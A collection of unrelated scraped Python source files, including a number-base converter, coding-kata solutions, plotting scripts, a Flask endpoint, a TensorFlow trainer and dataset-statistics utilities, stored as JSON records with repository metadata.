rgb_mode=True))\n\n def green(self):\n print(colr().hex(\"#00ff8d\", self, rgb_mode=True))\n\n def gnome_green(self):\n print(colr().hex(\"#2ed1b4\", self, rgb_mode=True))\n\n def dark_orange(self):\n print(colr().hex(\"#cf301b\", self, rgb_mode=True))\n\n def light_gnome(self):\n print(colr().hex(\"#00ffc4\", self, rgb_mode=True))\n\n def 
yellow_green(self):\n print(colr().hex(\"#7ed666\", self, rgb_mode=True))\n\n def violet(self):\n print(colr().hex(\"#cc33ff\", self, rgb_mode=True))\n\n def light_green(self):\n print(colr().hex(\"#21ff00\", self, rgb_mode=True))\n\n def orange(self):\n print(colr().hex(\"#ff8e35\", self, rgb_mode=True))\n\n def yellow(self):\n print(colr().hex(\"#fff300\", self, rgb_mode=True))\n\n def sky_blue(self):\n print(colr().hex(\"#00ccff\", self, rgb_mode=True))\n\n def blue(self):\n print(colr().hex(\"#0000ff\", self, rgb_mode=True))\n\n def cream(self):\n print(colr().hex(\"#ff9999\", self, rgb_mode=True))\n\n def dark_rose(self):\n print(colr().hex(\"#cc0066\", self, rgb_mode=True))\n\n def dark_red(self):\n print(colr().hex(\"#cc0000\", self, rgb_mode=True))\n\n def dark_green(self):\n print(colr().hex(\"#009933\", self, rgb_mode=True))\n\n def light_blue(self):\n print(colr().hex(\"#6666ff\", self, rgb_mode=True))\n\n\nclass Style:\n null = \"\"\n dash = null.center(58, \"-\")\n\n\nclass Operator:\n def exit():\n Colors.red(\"\\n You exited\")\n\n def invalid():\n print(\n colr().hex(\n \"#ff8e35\",\n \"\"\" (__) \n (oo) \n /------\\/ \n / | || \n * /\\---/\\ \n ~~ ~~ \n \"\"\",\n rgb_mode=True,\n ),\n colr().hex(\"#ff0000\", \"...invalid input...\", rgb_mode=True),\n )\n\n\nclass Methods:\n def octal_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter octal number: \")\n octal = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n try:\n octal_digits = list(map(int, str(octal)))\n binary_digits = [format(digit, \"03b\") for digit in octal_digits]\n binary_result = \"\".join(binary_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" ({binary_result})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \" Error: Invalid octal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_to_octal():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n show_decimal = decimal_number\n try:\n decimal_number = int(decimal_number)\n if decimal_number == 0:\n Colors.red(\n \"0\" # Special case for input 0, as its octal representation is also 0\n )\n\n octal_digits = []\n while decimal_number > 0:\n quotient, remainder = divmod(decimal_number, 8)\n octal_digits.insert(\n 0, str(remainder)\n ) # Insert the remainder at the beginning of the list\n decimal_number = quotient\n\n octal_result = \"\".join(octal_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n octal = f\" ({octal_result})8\"\n Colors.red(f\"{octal.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_to_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n decimal_number = int(decimal_number)\n try:\n if decimal_number == 0:\n Colors.red(\n \"0\" # Special case for input 0, as its octal representation is also 0\n )\n binary_digits = []\n while decimal_number > 0:\n quotient, remainder = divmod(decimal_number, 2)\n binary_digits.insert(\n 0, str(remainder)\n ) # Insert the remainder at the beginning of the 
list\n decimal_number = quotient\n\n binary_result = \"\".join(binary_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" ({binary_result})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def binary_to_decimal():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter binary value : \")\n binary_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n try:\n decimal_number = 0\n\n # Iterate over the binary digits in reverse order\n for i, bit in enumerate(reversed(binary_number)):\n if bit == \"1\":\n decimal_number += 2**i\n\n decimal_result = str(decimal_number)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n decimal = f\" ({decimal_result})2\"\n Colors.red(f\"{decimal.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid binary input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_to_hexadecimal():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_number = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n try:\n decimal_number = int(decimal_number)\n if decimal_number == 0:\n Colors.red(\n \"0\" # Special case for input 0, as its octal representation is also 0\n )\n hex_digits = \"0123456789ABCDEF\"\n hexadecimal_string = \"\"\n\n while decimal_number > 0:\n remainder = decimal_number % 16\n hexadecimal_string = hex_digits[remainder] + hexadecimal_string\n decimal_number //= 16\n Colors.light_blue(\"\\n\" + \" \" + dash)\n hexadecimal = f\" ({hexadecimal_string})16\"\n Colors.red(f\"{hexadecimal.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def hex_to_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter hexadecimal number: \")\n hex_string = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n hex_string = hex_string.upper()\n try:\n hex_digits = \"0123456789ABCDEF\"\n binary_digits = [\n bin(hex_digits.index(digit))[2:].zfill(4) for digit in hex_string\n ]\n binary_string = \"\".join(binary_digits)\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" ({binary_string})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid hexadecimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n\n def decimal_float_binary():\n null = \"\"\n dash = null.center(58, \"-\")\n Colors.light_blue(\"\\n Enter decimal number: \")\n decimal_fraction = input(colr().hex(\"#ff0000\", \"\\n > \", rgb_mode=True))\n decimal_fraction = float(decimal_fraction)\n try:\n integral_part = int(decimal_fraction)\n fractional_part = decimal_fraction - integral_part\n\n integral_binary = bin(integral_part)[2:]\n\n fractional_binary = \"\"\n while fractional_part > 0:\n fractional_part *= 2\n bit = int(fractional_part)\n fractional_binary += str(bit)\n fractional_part -= bit\n binary_string = f\"{integral_binary}.{fractional_binary}\"\n Colors.light_blue(\"\\n\" + \" \" + dash)\n binary = f\" 
({binary_string})2\"\n Colors.red(f\"{binary.center(60)}\")\n Colors.light_blue(\" \" + dash)\n except ValueError:\n Colors.light_blue(\"\\n\" + \" \" + dash)\n error = \"Error: Invalid float decimal input!\"\n Colors.red(f\"{error.center(60)}\")\n Colors.light_blue(\" \" + dash)\n","repo_name":"AbhiJohnv/Converter","sub_path":"class_def.py","file_name":"class_def.py","file_ext":"py","file_size_in_byte":9741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30077743327","text":"\"\"\"\r\n\n\nCreate a function which creates a square dartboard of side length `n`. The\nvalue of a number should increase, the closer it is to the centre of the\nboard.\n\n### Examples\n\n make_dartboard(3) ➞ [\n 111,\n 121,\n 111\n ]\n \n make_dartboard(8) ➞ [\n 11111111,\n 12222221,\n 12333321,\n 12344321,\n 12344321,\n 12333321,\n 12222221,\n 11111111\n ]\n \n make_dartboard(5) ➞ [\n 11111,\n 12221,\n 12321,\n 12221,\n 11111\n ]\n\n### Notes\n\nIf the size given is an even number, the centre should be made up of the 4\nhighest values.\n\n\"\"\"\r\n\ndef make_dartboard(n):\n m = n // 2 + n % 2\n s = [\"1\" * m]\n for i in range(1, m):\n add = s[-1][: i] + (m - i) * str(i + 1)\n s.append(add)\n if n % 2 == 1:\n s = [i[:-1] + i[::-1] for i in s]\n s = s[:-1] + s[::-1]\n else: \n s = [i + i[::-1] for i in s]\n s = s + s[::-1]\n return [int(i) for i in s]\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"Kv8DMmwfuKTLyZD5E_15.py","file_name":"Kv8DMmwfuKTLyZD5E_15.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72040011930","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 3 11:57:53 2018\n\n@author: aparnami\n\"\"\"\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nroute=\"F34toOldCon\"\nroot = os.path.join(os.curdir, \"Models\", route)\n\nfile_alldays = 'residue_alldays.csv'\nfile_weekdays = 'residue_weekdays.csv'\n\nresidue_alldays = pd.read_csv(os.path.join(root, file_alldays), header=None, index_col=None)\nresidue_alldays = np.reshape(residue_alldays.values, (-1,1))\n\nresidue_weekdays = pd.read_csv(os.path.join(root, file_weekdays), header=None, index_col=None)\nresidue_weekdays = np.reshape(residue_weekdays.values, (-1,1))\n\n#Visualize the results\nintervals = int(24 * 60 / 5)\ntime_labels = []\nk = []\nfor i in range(intervals):\n if (i+1) % 12 == 0:\n h = int((i+1) / 12)\n time_str = '{:02d}:00'.format(h)\n time_labels.append(time_str)\n k.append(i)\n\nplt.figure()\nplt.plot(residue_alldays, color = 'cyan', label='Residue All Days')\nplt.plot(residue_weekdays, color = 'blue', label='Residue Weekdays')\nplt.title('Residue Plots')\nplt.xlabel('Clock')\nplt.ylabel('Time(s)')\nplt.xticks(k,time_labels,fontsize=7)\n\nplt.legend()\nplt.show()\n\nx = range(intervals)\ny1 = residue_alldays[:,0]\ny2 = residue_weekdays[:,0]\nfig, ax = plt.subplots(1, 1, sharex=True)\n#ax.plot(x, y1, x, y2, color='black')\nax.plot(x, y1,color='cyan', label='Residue All Days')\nax.plot(x,y2, color='blue', label='Residue Weekdays')\nax.fill_between(x, y1, y2, where=y2 >= y1, facecolor='red', interpolate=True)\nax.fill_between(x, y1, y2, where=y2 <= y1, facecolor='green', interpolate=True)\nax.set_title('Residue between Allday vs Weekday Predictions')\nplt.xlabel('Clock')\nplt.ylabel('Time(s)')\nplt.xticks(k,time_labels,fontsize=7)\nplt.legend()\n\n\n","repo_name":"ArchitParnami/UAP","sub_path":"Pattern 
Analysis/PlotResidue.py","file_name":"PlotResidue.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34215442244","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ntotal = int(input())\r\nn = int(input())\r\nsums = 0\r\n\r\nfor _ in range(n):\r\n won, nums = map(int, input().split())\r\n sums += won*nums\r\n\r\nif sums == total:\r\n print(\"Yes\")\r\nelse: print(\"No\")","repo_name":"younghoonNa/Algorithm","sub_path":"Python/25304(영수증).py","file_name":"25304(영수증).py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31582179718","text":"#!/usr/bin/env python3\n#author: Tian Xia (SummerRainET2008@gmail.com)\n\nfrom pa_nlp.tf import *\nfrom pa_nlp.tf.estimator.param import ParamBase\n\nclass _ModelBuff:\n def __init__(self, model_path: str, capacity: int):\n '''bug: multiple files'''\n self._all_records = defaultdict(list)\n self._capacity = capacity\n self._model_path = model_path \n \n def update(self, batch_id: int, data_losses: list):\n '''\n :param data_losses: [(data_file, loss), ...]\n :return: \n '''\n all_records = self._all_records\n kept_batch_ids = set()\n removed_batch_ids = set()\n for data_file, loss in data_losses:\n records = all_records[data_file]\n records.append((loss, batch_id, data_file))\n if len(records) > self._capacity:\n records.sort()\n \n for p, (_, his_batch_id, _) in enumerate(records):\n if p < self._capacity:\n kept_batch_ids.add(his_batch_id)\n else:\n removed_batch_ids.add(his_batch_id)\n \n records.pop(self._capacity) \n \n for his_batch_id in removed_batch_ids - kept_batch_ids:\n self._remove_model(his_batch_id)\n\n def _remove_model(self, batch_id: int):\n file = os.path.join(self._model_path, f\"model-{batch_id}.*\")\n nlp.execute_cmd(f\"rm {file}\")\n\nclass TrainerBase(abc.ABC):\n def __init__(self, param: ParamBase, model_cls, predictor_cls, data_reader_cls):\n self._param = param\n self._model_cls = model_cls\n self._predictor_cls = predictor_cls\n self._data_reader_cls = data_reader_cls\n\n random.seed()\n nlp.ensure_folder_exists(param.path_work)\n\n self._model = model_cls(param, True)\n self._lr = tf.placeholder(dtype=tf.float32, shape=[])\n self._train_op = nlp_tf.construct_optimizer2(\n self._model.loss, learning_rate=self._lr\n )\n\n max_to_keep = 3 if nlp.is_none_or_empty(self._param.eval_files) else 1000\n self._saver = tf.train.Saver(tf.global_variables(), max_to_keep=max_to_keep)\n self._model_buff = _ModelBuff(self._param.path_model, 2)\n\n self._predictor = None\n if not nlp.is_none_or_empty(self._param.eval_files):\n pred_param = copy.deepcopy(self._param)\n pred_param.epoch_num = 1\n self._predictor = self._predictor_cls(\n pred_param, self._model_cls, self._data_reader_cls\n )\n\n nlp_tf.get_network_parameter_num()\n\n def _get_batch_id(self):\n return self._sess.run(tf.train.get_global_step())\n\n def _save_model(self):\n nlp_tf.model_save(\n self._saver, self._sess, self._param.path_model, \"model\", self._batch_id,\n )\n\n def _evaluate(self):\n self._save_model()\n\n self._predictor.load_model(self._param.path_model)\n data_losses = []\n for data_file in self._param.eval_files:\n key_measure = self._predictor.predict_dataset(data_file)\n data_losses.append((data_file, key_measure))\n \n self._model_buff.update(self._get_batch_id(), data_losses)\n for records in self._model_buff ._all_records.values():\n loss, batch_id, 
data_file = records[0]\n print(f\"[optimal]: '{data_file}', batch_id: {batch_id}, measure={loss}\")\n print()\n\n @abc.abstractmethod\n def _run_one_batch(self, epoch_id, batch_data):\n pass\n\n def train(self):\n self._sess = nlp_tf.get_new_session()\n self._sess.run(tf.global_variables_initializer())\n param = self._param\n\n reader = self._data_reader_cls(param.train_file, param, True)\n for epoch_id, batch_data in reader.get_batch_data():\n self._run_one_batch(epoch_id, batch_data)\n self._batch_id = self._get_batch_id()\n\n if param.evaluate_freq is not None and \\\n (self._batch_id + 1) % param.evaluate_freq == 0:\n self._evaluate()\n\n self._save_model()\n\n","repo_name":"YingtongBu/insight_nlp","sub_path":"pa_nlp/tf/estimator/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8555279382","text":"import csv, sys\nimport gender_guesser.detector as gender\nd = gender.Detector()\nfrom genderizer.genderizer import Genderizer as g\n\n# argument handling\nif len(sys.argv) is not 2:\n sys.exit('Please enter a school name! (Options: Penn, Brown, or Harvard)')\n\nschool = sys.argv[1].lower()\n\nif school != 'penn' and school != 'harvard' and school != 'brown':\n sys.exit('Not a valid school. Try Penn, Brown, or Harvard!')\n\nwith open('data/honorees_' + school + '_clean.csv', 'rb') as honorees, open('data/genders_' + school + '.csv', 'wb') as output:\n r = csv.reader(honorees)\n w = csv.writer(output)\n\n w.writerow(['Name', 'Year', 'Gender Guesser', 'Genderizer', 'Final'])\n\n for row in r:\n name = row[0]\n names = name.split(' ')\n gender = d.get_gender(names[0])\n gender2 = g.detect(firstName=names[0])\n w.writerow([name, row[1], gender, 'unknown' if gender2 is None else gender2, gender if gender == gender2 else 'unknown'])\n","repo_name":"dailypenn/data","sub_path":"honorary-degrees-gender-breakdown/gender.py","file_name":"gender.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"30294568085","text":"#!/usr/bin/env python\n\n\"\"\"\nAuthor: Cindy Tan\nLast Modified Date: 6 June 2017\n\nProcesses a Compucell3D simulation xml file and graphs one or more parameters.\nArguments:\n -f inputfile - full path to XML file\n -p parameters - comma separated parameters to graph\n -i image - method of graphing multiple parameters\n 0 (default) - plot all parameters on the same axis, one output\n 1 - plot each parameter on its own subplot of a figure, one output of the entire figure\n 2 - plot each paramater on its own figure, one output for each parameter\nOutput: graphs max, min, and average of a parameter and saves image(s) of graph in the script directory.\n\"\"\"\n\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom lxml import etree as et\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option('-f', '--file', type='string', dest='inputfile', help='path to XML file')\nparser.add_option('-p', '--parameters', type='string', dest='parameters', help='comma separated parameters to graph')\nparser.add_option('-i', '--image', type='int', dest='image', help='0 (default) - plot on same axis, one output; ' +\n '1 - plot separately, one output with all plots; 2 - plot separately, one output for each plot')\n\n(options, args) = parser.parse_args()\ninputfile = options.inputfile\nparameters = options.parameters.split(',')\nimage 
= 0\nif options.image:\n image = options.image\n\ntree = et.parse(inputfile)\nroot = tree.getroot()\n\ndata = np.empty([len(parameters), len(root), 3])\n\nparameter = 0\nwhile parameter < len(parameters):\n\n time = 0\n while time < len(root):\n parameter_values = np.empty(len(root[time]))\n\n cell = 0\n while cell < len(root[time]):\n parameter_values[cell] = root[time][cell].get(parameters[parameter])\n cell += 1\n\n data[parameter, time, 0], data[parameter, time, 1], data[parameter, time, 2] = \\\n np.amax(parameter_values), np.amin(parameter_values), np.average(parameter_values)\n\n time += 1\n parameter += 1\n\nif len(parameters) == 1:\n plt.plot(data[0])\n plt.legend(['max', 'min', 'average'], bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., fontsize=9)\n plt.ylabel(parameters[0])\n plt.xlabel('time')\n plt.show()\nelse:\n if image == 0:\n plt.subplot2grid((1, 4), (0, 0), colspan=3)\n\n parameter = 0\n while parameter < len(parameters):\n plt.plot(np.transpose(data[parameter])[0], label=parameters[parameter] + ' max')\n plt.plot(np.transpose(data[parameter])[1], label=parameters[parameter] + ' min')\n plt.plot(np.transpose(data[parameter])[2], label=parameters[parameter] + ' average')\n\n parameter += 1\n plt.xlabel('time')\n plt.ylabel(', '.join(parameters))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., fontsize=9)\n plt.savefig('_'.join(parameters) + '.png')\n if image == 1:\n side = int(math.ceil(math.sqrt(len(parameters))))\n maxrows = int(math.ceil(float(len(parameters)) / side))\n\n plt.figure(1)\n\n parameter = 0\n while parameter < len(parameters):\n plt.subplot(maxrows, side, parameter + 1)\n\n plt.plot(data[parameter])\n plt.xlabel('time')\n plt.ylabel(parameters[parameter])\n\n parameter += 1\n plt.tight_layout()\n plt.savefig('_'.join(parameters) + '.png')\n if image == 2:\n parameter = 0\n while parameter < len(parameters):\n plt.subplot2grid((1, 4), (0, 0), colspan=3)\n\n plt.plot(np.transpose(data[parameter])[0], label=parameters[parameter] + ' max')\n plt.plot(np.transpose(data[parameter])[1], label=parameters[parameter] + ' min')\n plt.plot(np.transpose(data[parameter])[2], label=parameters[parameter] + ' average')\n\n plt.xlabel('time')\n plt.ylabel(parameters[parameter])\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., fontsize=9)\n\n plt.show()\n\n parameter += 1\n","repo_name":"miseminger/usra-2017","sub_path":"plot_compucell3d_data.py","file_name":"plot_compucell3d_data.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44801345442","text":"#==============================================\n# 样本库数据集数据分析\n# lichuan\n# lc@dlc618.com\n# 2021.7.6\n#==============================================\n\nimport glob,os\n\nimport csv\nimport numpy as np\n\n\ndef get_dir_file(dir_name, pattern = [\"*.png\",\"*.jpg\",\"*.jpeg\"]):\n '''\n 功能\n 读取路径下指定后缀的文件路径\n 输入\n dir_name :路径\n pattern :文件后缀要求\n 输出\n 所以符合条件的文件\n '''\n files = []\n for p in pattern:\n for dir,_,_ in os.walk(dir_name):\n files.extend(glob.glob(os.path.join(dir,p)))\n \n return files\n\n\ndef writer_csv(csv_file,data):\n '''\n 功能:\n 列表数据保存为 csv 文件\n 输入:\n csv_file : 保存路径\n data : 要保存的列表数据\n 输出:\n 成功\n '''\n\n with open(csv_file, 'w', newline='') as f: \n writer = csv.writer(f)\n writer.writerows(data)\n\n return True\n\n\ndef read_csv(csv_file):\n '''\n 功能:\n 读取 csv 文件为列表\n 输入:\n csv_file : csv 文件路径\n 输出:\n data : 列表数据\n '''\n data = list()\n\n with open(csv_file, 'r', 
newline=\"\") as f: \n reader = csv.reader(f)\n for row in reader:\n data.append(row)\n\n return data\n\n\ndef statistics(list):\n '''\n 功能:\n 统计列表中字符出现的次数\n 输入:\n list : 要统计的列表\n 输出:\n frequency : 字典格式\n '''\n frequency = {}\n\n for word in list:\n if word not in frequency:\n frequency[word] = 1\n else:\n frequency[word] += 1\n\n return frequency\n\n\ndef path_split(\n path='/media/lcq/样本库/铁路标注数据/保定/白天/<30/平交道口/人/JPEGImages/001903.jpg',\n # path='/media/lcq/样本库/铁路标注数据/客技站/白天/50/轨面/Annotations'\n ):\n\n '''\n 功能\n 根据图片的文件路径提取关键词\n 输入\n path :图片路径\n 输出\n 关键词列表\n '''\n\n path_split = path.split('/')\n img_name = path_split[-1]\n location = path_split[-7]\n sunshine = path_split[-6]\n distance = path_split[-5]\n scene = path_split[-4]\n target = path_split[-3]\n\n keys = [\n # path,\n img_name,\n location,\n sunshine,\n distance,\n scene,\n target]\n\n return keys\n\n\ndef test_get():\n \n # 测试路径\n # dir_name = 'dataset/'\n \n # 样本库测试路径\n # dir_name = '/media/lcq/样本库/铁路标注数据/保定'\n # dir_name = '/media/lcq/样本库/铁路标注数据/东郊'\n # dir_name = '/media/lcq/样本库/铁路标注数据/客技站'\n # dir_name = '/media/lcq/样本库/铁路标注数据/马鞍山'\n dir_name = '/media/lcq/样本库/铁路标注数据/亦庄'\n\n images_path = get_dir_file(dir_name)\n images_num = len(images_path)\n\n # ===================info ===================\n print('dir path : {}'.format(dir_name))\n print('file num : {}'.format(images_num))\n\n all_keys = []\n\n for i in range(images_num):\n\n keys = path_split(images_path[i])\n all_keys.append(keys)\n \n print('--{}/{}:{}'.format(i,images_num,keys))\n\n writer_csv('railSample_yz.csv', all_keys)\n\n\ndef test_read():\n\n csv_file = '/media/lcq/Data/modle_and_code/DataSet/RailSample/railSample.csv'\n\n headers = [\n 'img_name', # 文件名\n 'location', # 采集地点\n 'sunshine', # 采集时间\n 'camera', # 摄像机类型\n 'distance', # 距离\n 'scene', # 场景\n 'target'] # 目标\n\n print('================== Start ==================')\n\n all_keys = read_csv(csv_file)\n all_keys = np.array(all_keys)\n\n # img_names = all_keys[:,0]\n locations = all_keys[:,1]\n sunshines = all_keys[:,2]\n cameras = all_keys[:,3]\n distances = all_keys[:,4]\n scenes = all_keys[:,5]\n targets = all_keys[:,6]\n\n print('总图片数量 :{}'.format(len(all_keys)))\n print('采集地点 : {}'.format(statistics(locations)))\n print('采集时间 : {}'.format(statistics(sunshines)))\n print('摄像机类型 : {}'.format(statistics(cameras)))\n print('目标距离 : {}'.format(statistics(distances)))\n print('图像场景 : {}'.format(statistics(scenes)))\n print('目标类型 : {}'.format(statistics(targets)))\n\n print('=================== End ===================')\n\n\nif __name__ == '__main__':\n test_read()","repo_name":"lichuanqi/Dataset_Tools","sub_path":"analysis/railSampleAnalysis.py","file_name":"railSampleAnalysis.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15081539395","text":"from flask import render_template, request\nimport requests\n\nfrom config import Config\nfrom forms import TagSelectForm\nfrom run import app\n\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n app.logger.info('Web: index called.')\n tag_select_form = TagSelectForm()\n if request.method == 'GET':\n return render_template('index.html', form=tag_select_form)\n elif request.method == 'POST':\n if tag_select_form.validate_on_submit():\n hair_color = tag_select_form.hair_color.data\n app.logger.info(hair_color)\n headers = {'Content-Type': 'application/json'}\n data = {'label': hair_color[:-5]}\n response = 
requests.get(Config.API_URI, headers=headers, json=data)\n img_bytes = response.json().get('img_bytes')\n imgs = [f\"data:image/png;base64,{img_byte}\" for img_byte in img_bytes]\n return render_template('result.html', imgs1=imgs[:5], imgs2=imgs[5:])\n else:\n return render_template('index.html', form=tag_select_form)","repo_name":"opeco17/kubernetes_raspberrypi_app","sub_path":"web/src/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26969001787","text":"# Definition for a undirected graph node\nclass UndirectedGraphNode(object):\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\nclass Solution(object):\n def cloneGraph(self, node):\n \"\"\"\n :type node: UndirectedGraphNode\n :rtype: UndirectedGraphNode\n \"\"\"\n if node == None:\n return None\n graphNodes = {}\n cloneNode = self.getGraphNode(node,graphNodes)\n return cloneNode\n def getGraphNode(self,node,graphNodes):\n cloneNode = UndirectedGraphNode(node.label)\n graphNodes[cloneNode.label] = cloneNode\n for neighborNode in node.neighbors:\n if neighborNode.label in graphNodes:\n cloneNeighrNode = graphNodes(neighborNode.label)\n else:\n cloneNeighrNode = self.getGraphNode(neighborNode,graphNodes)\n cloneNode.neighbors.append(cloneNeighrNode)\n return cloneNode\n\n","repo_name":"FengFengHan/LeetCode","sub_path":"Clone Graph_wrong.py","file_name":"Clone Graph_wrong.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30070563717","text":"\"\"\"\r\n\n\nCreate a function that takes two numbers `num1`, `num2`, and a list `lst` and\nreturns a list containing all the numbers in `lst` greater than `num1` and\nless than `num2`.\n\n### Examples\n\n list_between(3, 8, [1, 5, 95, 0, 4, 7]) ➞ [5, 4, 7]\n \n list_between(1, 10, [1, 10, 25, 8, 11, 6]) ➞ [8, 6]\n \n list_between(7, 32, [1, 2, 3, 78]) ➞ []\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef list_between(num1, num2, lst):\n new_list = []\n for value in lst:\n if value > num1 and value < num2:\n new_list.append(value)\n continue\n return new_list\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"HJNhLoS4W8jdEYprh_10.py","file_name":"HJNhLoS4W8jdEYprh_10.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24518118574","text":"#Replace all ______ with rjust, ljust or center. 
\n'''\nthickness = int(raw_input()) #This must be an odd number\nc = 'H'\n\n#Top Cone\nfor i in range(thickness):\n print (c*i).rjust(thickness-1)+c+(c*i).ljust(thickness-1)\n\n#Top Pillars\nfor i in range(thickness+1):\n print (c*thickness).rjust(thickness*2)+(c*thickness).ljust(thickness*6)\n\n#Middle Belt\nfor i in range((thickness+1)/2):\n print (c*thickness*5).center(thickness*6) \n\n#Bottom Pillars\nfor i in range(thickness+1):\n print (c*thickness).rjust(thickness*2)+(c*thickness).ljust(thickness*6) \n\n#Bottom Cone\nfor i in range(thickness):\n print ((c*(thickness-i-1)).rjust(thickness)+c+(c*(thickness-i-1)).ljust(thickness)).center(thickness*6) ''' \n \nfrom __future__ import print_function, division\n\nchar = 'H'\nspace = ' '\n\ndef aligntext(width):\n lines = []\n for n in range(width):\n lines.append((char*(n*2+1)).center(width*2-1, space))\n\n offset = space*(width*4 - (width*2-1))\n\n for n in range(width+1):\n lines.append((char*width).center(width*2-1, space) + offset + (char*width).center(width*2-1, space))\n\n for n in range((width+1)//2):\n lines.append((char*width*5).center(width*6, space))\n\n for n in range(width+1):\n lines.append((char*width).center(width*2-1, space) + offset + (char*width).center(width*2-1, space))\n\n for n in reversed(range(width)):\n lines.append(space*(width*4) + (char*(n*2+1)).center(width*2-1, space))\n\n return lines\n\ndef main():\n W = int(input())\n print('\\n'.join(aligntext(W)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"mraduldubey/HackerRank-Python-Challenge","sub_path":"Strings/l21.py","file_name":"l21.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29984056185","text":"#!/usr/bin/env python3\n\nfrom keras.preprocessing import sequence\nimport keras\nimport tensorflow as tf\nimport os\nimport numpy as np\nimport pandas as pd\n\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim,\n batch_input_shape=[batch_size, None]),\n tf.keras.layers.LSTM(rnn_units,\n return_sequences=True,\n stateful=True,\n 